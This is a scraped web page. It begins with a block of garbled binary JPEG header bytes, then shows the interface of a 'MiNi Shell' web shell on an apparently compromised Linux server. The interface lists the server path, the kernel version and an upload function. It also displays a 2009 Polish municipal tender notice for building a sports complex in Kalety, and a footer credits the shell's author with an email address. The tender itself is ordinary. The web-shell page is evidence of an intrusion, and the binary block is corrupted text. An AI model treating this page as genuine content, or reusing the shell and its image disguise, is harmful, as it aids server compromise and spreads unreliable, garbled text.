JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/146755-N-2009.html

<p class="kh_header"><b>Kalety: BUDOWA KOMPLEKSU SPORTOWEGO MOJE BOISKO - ORLIK 2012</b><br>
<b>Numer ogłoszenia: 146755 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski Kalety , ul. Żwirki i Wigury 2, 42-660 Kalety, woj. śląskie, tel. 034 3527630, faks 034 3527635.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kalety.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA KOMPLEKSU SPORTOWEGO MOJE BOISKO - ORLIK 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Budowa boiska do piłki nożnej o wymiarach 30,0 m x 62,0m o pow. całkowitej 1860 m2 (pole gry 26,0 x 56,0 m)
- podbudowa przepuszczalna z odwodnieniem drenażowym
- nawierzchnia do piłki nożnej - sztuczna trawa
Wariant I: 
Wysokość włókna min. 60 mm na podbudowie z kruszywa (wypełnienie z trawy zgodnie z badaniem specjalistycznego laboratorium np. Labosport) 
1. Typ włókna: monofil
2. Skład chemiczny włókna; polietylen
3. Ciężar włókna: min. 11.000 Dtex,
4. Gęstość trawy: min. 97.000 włókien /m2
- obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu od płyty boiska.
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji technicznej.
Roboty należy wykonać zgodnie z dokumentacją projektową i SST. 
- Wyposażenie
- bramki aluminiowe mocowane w tulejach - 2 sztuki
- siatki do bramek - 2 sztuki
B. Budowę boiska wielofunkcyjnego o wymiarach 30,0 x 50,0 m o powierzchni 1500 m2 
Podbudowa:
II Sposób - Podbudowa nieprzepuszczalna z zastosowaniem korytek odwodnieniowych typu ACO.
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji projektowej. 
Roboty należy wykonać zgodnie z dokumentacją projektową i SST.
Nawierzchnia boiska wielofunkcyjnego nawierzchnia poliuretanowa wykonana o właściwościach i technologii układania określonych w dokumentacji projektowej i SST.
Technologie układania nawierzchni:
II Sposób: Technologia typu NATRYSK - na podbudowie z kruszywa kamiennego instaluje się warstwę przepuszczalną dla wody i warstwę stabilizującą typu ET (w przypadku nieprzepuszczalnej podbudowy betonowej, asfaltowej lub asfaltowo-betonowej warstwa ET nie jest wymagana). Następnie warstwę gr. 10-11 mm z granulatu SBR, następnie warstwę natrysku (mieszanka granulatu EPDM zmieszana z PU) o grubości 2 - 3mm.
Wyposażenie do piłki koszykowej:
- obręcz do koszykówki standard i siatka do obręczy - 4 sztuki
- tablica do koszykówki epoksydowa o wym. 105 x 180cm - 4 sztuki
- mechanizm regulacji wysokości - 4 sztuki
- konstrukcja do koszykówki dwusłupowa, montowana w tulejach - 4 sztuki
- siatka do obręczy - 4 sztuki
Wyposażenie do piłki siatkowej:
- słupki do siatkówki, aluminiowe wielofunkcyjne (badminton, tenis, siatkówka)- 4 sztuki
- siatka do siatkówki - 2 sztuki
Wyposażenie do piłki ręcznej:
- bramki aluminiowe mocowane w tulejach - 2 sztuki
- siatki do bramek - 2 sztuki
C. Ogrodzenie terenu
Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST.
D. Oświetlenie terenu 
Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST.
E. Chodniki
Ciągi komunikacyjne i powierzchnia przeznaczona pod kontener (na odpadki stałe) - kostka polbrukowa gr. min 6 cm, na podbudowie z piasku i kruszywa, zamknięta obrzeżem betonowym. Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST.
F. Przebudowa pomieszczeń zaplecza szatniowo - socjalnego na podstawie Programu Funkcjonalno Użytkowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu winien wnieść wadium w wysokości: 30.000 zł, tytuł: wadium: BUDOWA KOMPLEKSU SPORTOWEGO MOJE BOISKO - ORLIK 2012 W KALETACH PRZY UL. 1 MAJA 6.
Dopuszczalne formy wadium (art. 45 ust. 6 ustawy):
1) pieniądz;
2) poręczenie bankowe lub poręczenie spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancje bankowe;
4) gwarancje ubezpieczeniowe;
5) poręczenie udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r., Nr 42 poz. 275).
Wadium w pieniądzu należy wpłacać na konto Urzędu Miejskiego 
w Kaletach, BS Myszków , Oddział Woźniki 
nr konta: 47 8279 1023 0202 6204 2002 0002.
Wadium w pozostałych formach, należy składać w oryginale, w biurze Skarbnika
Gminy I piętro pok. nr 6.
Wniesione wadium musi obejmować okres związania ofertą.
Termin wnoszenia wadium do dnia: 23 września 2009 r. do godz. 9:45.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: a) spełniają warunki określone w art. 22 ust. 1 pkt 1-4 ustawy Pzp, b) złożą oświadczenie, że nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp z postępowania o udzielenie zamówienia publicznego.
2. Ocena spełniania powyższych warunków dokonana zostanie zgodnie z formułą, spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w rozdziale III SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że powyższe warunki Wykonawca spełnił.
3. Niespełnienie chociażby jednego z powyższych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W przetargu mogą wziąć udział wykonawcy którzy złożą wypełniony formularz
ofertowy wraz z poniższymi załącznikami:
1. pisemne oświadczenie wykonawcy o spełnieniu wymogów wynikających z art. 22 ust. 1 (ustawy Prawo zamówień publicznych),
2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3. aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. aktualne zaświadczenia naczelnika właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5. polisę lub inny dokument ubezpieczenia od odpowiedzialności cywilnej w zakresie 
prowadzonej działalności na kwotę nie mniejszą niż 1.000 000 PLN (aktualną na dzień składania ofert)
6. wykaz zrealizowanych w ciągu ostatnich 5 lat przed wszczęciem postępowania 
udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy
- w tym okresie, robót budowlanych polegajacych na budowie boisk sportowych 
(CPV 45 21 22 21 - 1) w tym: jednego boiska piłkarskiego z nawierzchnią z trawy 
syntetycznej i jednego boiska z nawierzchnią poliuretanową z podaniem ich wartości
dat wykonania oraz inwestorów, 
7. dokumenty potwierdzające należyte wykonanie robót wymienionych w wykazie,
(dokumenty należy przedstawić w kolejności zgodnej z wykazem),
8. wykaz personelu technicznego: kierownika budowy, kierowników robót, które będą wykonywać zamówienie, należy wykazać, że wykonawca przy wykonywanych robotach dysponować będzie pracownikami nadzoru posiadającymi uprawnienia niezbędne do wykonywania przedmiotu zamówienia. Wykonawca musi dysponować minimum: 1. osobą z uprawnieniami do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej, 1. osobą z uprawnieniami do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci wodociągowej wodociągowych i kanalizacyjnych oraz 1. osobą z uprawnieniami do kierowania robotami budowlanymi w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Osoby z uprawnieniami muszą legitymować się przynależnością doIzby Inżynierów Budownictwa,
9. poświadczone przez Wykonawcę kopie wymaganych uprawnień oraz aktualne 
zaświadczenia o przynależności do Okręgowej Izby Inżynierów Budownictwa osób wymienionych w wykazie,
10. oświadczenie Wykonawcy o zakresie robót do wykonania przez Podwykonawców,
(w przypadku wykonywania przez Wykonawcę całego zakresu zamówienia, proszę 
w oświadczeniu w wpisać - nie dotyczy),
11. kosztorys ofertowy - sporządzone na podstawie i zgodnie z opisem przedmiotu  
zamówienia, przedmiarami robót, projektami oraz specyfikacją techniczną,
kosztorys ofertowy należy sporządzić metodą kalkulacji uproszczonej, podając
podstawę wyceny, opis robót, jednostkę obmiaru, cenę jednostkową, oraz wartość
pozycji,
12. oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust.1 i ust. 2,
13. oświadczenie, że wykonawca akceptuje warunki specyfikacji oraz przyjmuje załączone warunki umowy bez zastrzeżeń,
14. kserokopia dokumentu potwierdzającego wniesienie wadium, (w przypadku wniesienia wadium w pieniądzu, informacja o banku i nr konta wykonawcy  
na które zamawiający dokona zwrotu wadium). 
15. Pełnomocnictwo do podpisania oferty winno być załączone do oferty, o ile nie wynika ono z przepisów lub innych dokumentów załączonych do oferty. Pełnomocnictwo powinno być podpisane przez osoby uprawnione do reprezentacji Wykonawcy i określać jego zakres.
16. Wykaz dokumentów i oświadczeń potwierdzających spełnienie warunków jakościowych, które należy dołączyć do oferty:
A. Dokumenty dotyczące nawierzchni poliuretanowej:
1.Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.
2. Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
3. Atest PZH dla oferowanej nawierzchni.
4. Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
B. Dokumenty dotyczące nawierzchni z trawy syntetycznej:
1. Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com).
2. Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny. 
3. Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
4. Atest PZH dla oferowanej nawierzchni.
5. Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
Informacje powinny być złożone na piśmie, a wymagane zaświadczenia w oryginale lub kopie poświadczone za zgodność z oryginałem przez wykonawcę (osobę upoważnioną do reprezentowania  podmiotu składającego ofertę).
Ponadto zaleca się by powyższe dokumenty były ułożone w spiętej (zszytej) teczce
w kolejności wymienionej powyżej.
Dokumenty wymagane w przypadku składania oferty wspólnej:
Oferta winna zawierać: oświadczenia i dokumenty opisane w SIWZ pkt. III. 1 - 4 i 12 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie. 
W przypadku złożenia oferty przez podmioty występujące wspólnie - wymagania dopuszczające do udziału w postępowaniu podlegają sumowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.kalety.bip.info.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miajski w Kaletach
ul. Żwirki i Wigury 2
42 - 660 KALETY
pok. nr 21 w dni robocze w godz. do 7:30 do 15:30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2009 godzina 09:45, miejsce: Urząd Miajski w Kaletach
ul. Żwirki i Wigury 2
42 - 660 KALETY
pok. nr 22 sekretariat burmistrza Miasta
w dni robocze w godz. do 7:30 do 15:30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com